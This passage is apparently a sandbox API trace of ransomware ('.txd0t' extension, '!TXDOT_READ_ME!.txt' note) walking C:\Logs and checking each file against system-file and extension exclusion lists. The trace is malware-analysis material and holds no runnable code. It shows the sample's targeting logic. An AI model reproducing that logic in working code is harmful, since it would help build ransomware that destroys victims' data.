ransom ") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="debug.txt") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="boot.ini") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="desktop.ini") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="autorun.inf") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntuser.dat") returned -1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntldr") returned -1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="ntdetect.com") returned -1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="bootfont.bin") returned 1 [0071.854] StrCmpIW (psz1="Internet Explorer.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.854] PathFindExtensionW (pszPath="Internet Explorer.evtx") returned=".evtx" [0071.854] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.854] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.854] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.854] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.854] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.854] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.854] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.855] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0071.855] StrCmpW (psz1="Key Management Service.evtx", psz2=".") returned 1 [0071.855] StrCmpW (psz1="Key Management Service.evtx", psz2="..") returned 1 [0071.855] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.855] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.855] StrNCatW (in: psz1="C:\\Logs\\", psz2="Key Management Service.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Key Management Service.evtx") returned="C:\\Logs\\Key Management Service.evtx" [0071.855] PathFindExtensionW (pszPath="Key Management Service.evtx") returned=".evtx" [0071.855] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="bootsect.bak") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="iconcache.db") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="thumbs.db") returned -1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2=" ransomware ") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2=" ransom ") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="debug.txt") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="boot.ini") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="desktop.ini") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="autorun.inf") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntuser.dat") returned -1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntldr") returned -1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="ntdetect.com") returned -1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="bootfont.bin") returned 1 [0071.855] StrCmpIW (psz1="Key Management Service.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.855] PathFindExtensionW (pszPath="Key Management Service.evtx") returned=".evtx" [0071.855] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.855] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.855] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.856] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.856] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.856] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.856] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.856] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx", cAlternateFileName="MICROS~1.EVT")) returned 1 [0071.856] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=".") returned 1 [0071.856] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="..") returned 1 [0071.856] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.856] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.856] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" [0071.856] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned=".evtx" [0071.856] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=" ransom ") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="debug.txt") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="boot.ini") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntldr") returned -1 [0071.856] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.857] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.857] StrCmpIW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.857] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned=".evtx" [0071.857] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.857] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.857] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.857] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.857] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.857] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.857] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.857] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0071.857] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=".") returned 1 [0071.857] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="..") returned 1 [0071.857] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.857] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.857] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0071.857] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned=".evtx" [0071.857] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.857] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="bootsect.bak") returned 1 [0071.857] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="iconcache.db") returned 1 [0071.857] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="thumbs.db") returned -1 [0071.857] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=" ransomware ") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=" ransom ") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="debug.txt") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="boot.ini") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="desktop.ini") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="autorun.inf") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntuser.dat") returned -1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntldr") returned -1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="ntdetect.com") returned -1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="bootfont.bin") returned 1 [0071.858] StrCmpIW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.858] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned=".evtx" [0071.858] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.858] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.858] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.858] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.858] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.858] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.858] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.858] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0071.858] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=".") returned 1 [0071.858] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="..") returned 1 [0071.859] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.859] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.859] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0071.859] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned=".evtx" [0071.859] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=" ransom ") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="debug.txt") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="boot.ini") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntldr") returned -1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.859] StrCmpIW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.859] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned=".evtx" [0071.859] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.860] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.860] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.860] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.860] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.860] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.860] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.860] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cAlternateFileName="MICROS~4.EVT")) returned 1 [0071.860] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=".") returned 1 [0071.860] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="..") returned 1 [0071.860] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.860] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.860] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0071.860] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned=".evtx" [0071.860] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="bootsect.bak") returned 1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="iconcache.db") returned 1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="thumbs.db") returned -1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=" ransomware ") returned 1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=" ransom ") returned 1 [0071.860] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="debug.txt") returned 1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="boot.ini") returned 1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="desktop.ini") returned 1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="autorun.inf") returned 1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntuser.dat") returned -1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntldr") returned -1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="ntdetect.com") returned -1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="bootfont.bin") returned 1 [0071.861] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.861] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned=".evtx" [0071.861] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.861] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.861] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.861] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.861] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.861] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.861] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.861] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cAlternateFileName="MI2EEA~1.EVT")) returned 1 [0071.861] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=".") returned 1 [0071.861] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="..") returned 1 [0071.861] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.861] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.861] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4MSI and Script.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" [0071.861] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned=".evtx" [0071.862] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="bootsect.bak") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="iconcache.db") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="thumbs.db") returned -1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=" ransomware ") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2=" ransom ") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="debug.txt") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="boot.ini") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="desktop.ini") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="autorun.inf") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", 